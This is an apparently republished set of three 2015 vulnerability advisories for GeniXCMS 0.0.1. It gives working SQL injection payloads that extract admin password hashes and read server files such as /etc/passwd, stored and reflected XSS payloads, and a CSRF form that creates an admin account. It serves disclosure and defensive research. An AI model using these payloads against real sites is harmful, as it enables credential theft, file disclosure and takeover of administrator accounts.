GeniXCMS 0.0.1 - Multiple Vulnerabilities





Platform:

PHP

Date:

2015-03-10



GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit

Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1

Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.

Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not
properly sanitised before being used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.

Tested on: nginx/1.4.6 (Ubuntu)
           Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5232
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php


05.03.2015

---


Get admin user/pass hash:
-------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j



Read file (C:\windows\win.ini) and MySQL version:
-------------------------------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j



Read file (/etc/passwd) and MySQL version:
------------------------------------------

http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j



Get admin user/pass hash:
-------------------------

POST /genixcms/gxadmin/login.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Accept: */*
User-Agent: ZSLScan_1.4
Connection: Close

password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=

################################################################################################

GeniXCMS v0.0.1 Persistent Script Insertion Vulnerability

Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1

Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.

Desc: Input passed to the 'cat' POST parameter is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: nginx/1.4.6 (Ubuntu)
           Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5233
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5233.php


05.03.2015

---


Stored:
-------

<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST">
      <input type="hidden" name="parent" value="2" />
      <input type="hidden" name="cat" value='"><script>alert(document.cookie)</script>' />
      <input type="hidden" name="addcat" value="" />
      <input type="submit" value="Insert" />
    </form>
  </body>
</html>



Reflected:
----------

http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>'

################################################################################################


GeniXCMS v0.0.1 CSRF Add Admin Exploit

Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1

Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.

Desc: The application allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits a malicious web
site.

Tested on: nginx/1.4.6 (Ubuntu)
           Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5234
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5234.php


05.03.2015

---


<html>
  <body>
    <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
      <input type="hidden" name="userid" value="Testingus" />
      <input type="hidden" name="pass1" value="123456" />
      <input type="hidden" name="pass2" value="123456" />
      <input type="hidden" name="email" value="t00t@zeroscience.eu" />
      <input type="hidden" name="group" value="0" />
      <input type="hidden" name="adduser" value="" />
      <input type="submit" value="Forge!" />
    </form>
  </body>
</html>